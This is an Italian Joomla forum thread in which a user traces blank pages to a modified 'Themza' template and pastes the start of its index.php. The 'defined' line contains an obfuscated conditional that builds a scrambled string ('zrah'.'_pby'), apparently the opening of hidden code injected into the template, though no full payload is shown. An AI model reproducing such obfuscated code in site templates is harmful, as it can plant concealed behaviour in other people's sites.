Back to top

Autore Topic: Problema componente contatti  (Letto 1769 volte)

Offline peppenido

• Esploratore
  • **
    • Mostra profilo
Problema componente contatti
« il: 05 Mar 2009, 12:59:03 »
Ciao a tutti,
ho un problema con il componente contatti che, solo adesso mi sono accorto non funzionare più, e non so da quando, in pratica quando richiamo la relativa voce di menu mi restituisce una pagina bianca ed il sorgente è completamente vuoto.
Ho provato ad installare altri componenti contatti, i primi tre o quattro e più popolari dalla lista delle estensioni ma, niente il problema è sempre lo stesso o pagina bianca o 404. Uno di questi lavora come modulo, niente anche qui dice che non trova il relativo componente.
Qualche tempo fa ebbi un problema e reinstallai un backup precedente, posso solo ipotizzare che sia nato tutto li.
Qualcuno ha qualche suggerimento?
Grazie
« Ultima modifica: 05 Mar 2009, 13:13:45 da peppenido »

Offline peppenido

• Esploratore
  • **
    • Mostra profilo
Re: Problema componente contatti
« Risposta #1 il: 09 Mar 2009, 02:50:51 »
Ritorno alla carica perchè ho notevoli problemi sul sito (ilmionido.com), oltre al componente contatti adesso anche il menu 'Sottometti un articolo' mi restutuisce una pagina bianca, in più se mi loggo come utente, quando poi vado a fare il logout ho sempre una pagina bianca come risultato, e comunque non esco.
Sapreste dirmi cosa potrei fare, se faccio un overwrite dei file di joomla con un backup cosa succede?
Spero che qualcuno possa aiutarmi perche proprio non so cosa fare!
Grazie

Offline maicolstaip

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #2 il: 09 Mar 2009, 13:51:44 »
Ciao,
per prima cosa controllerei se hai abilitato le friendly urls.
Se lo hai fatto, hai rinominato il file htaccess.txt?
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline peppenido

• Esploratore
  • **
    • Mostra profilo
« Risposta #3 il: 09 Mar 2009, 14:28:49 »
Si le friendly urls sono abilitate, ma questi problemi non li avevo comunque subito dopo l'abilitazione, provai a rinominare il file htaccess ma poi il sito andava in errore non facendomi vedere più nulla, così lo ho lasciato come era non avendo riscontri negativi, allora!

Offline maicolstaip

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #4 il: 09 Mar 2009, 14:39:44 »
Ciao,
se se clicchi "Invia un articolo" e guardi la pagina non è bianza ma ci sono i caratteri:
Codice: [Seleziona]
Hai editato il file configuration.php o l'index.php del template? Controlla che non comincino con una riga vuota.

"Contatti" a me funziona.

Comunque puoi fare un overwrite dei files con il backup e si ripristina la situazione che avevi al momento del backup stesso.

Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline peppenido

• Esploratore
  • **
    • Mostra profilo
« Risposta #5 il: 09 Mar 2009, 16:41:43 »
Ciao!
Grazie e complimenti!!!
Hai centrato la causa del problema, ho provato ad abilitare un'altro template ed i problemi sono tutti spariti. In effetti questo template, ho modificato un 'Themza_j15_13', è attivo sul sito da circa 15 giorni. Comunque le modifiche che ho fatto riguardano solo le immagini e qualcosa sul css, null'altro.
Il file index.php del template inizia in questo modo:
<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>

Tu pensi che si possa cambiare o cosa posso fare per risolvere visto che comunque mi piace e vorrei usare questo?
Ciao, grazie di nuovo.  ;)

Web Design Bolzano Kreatif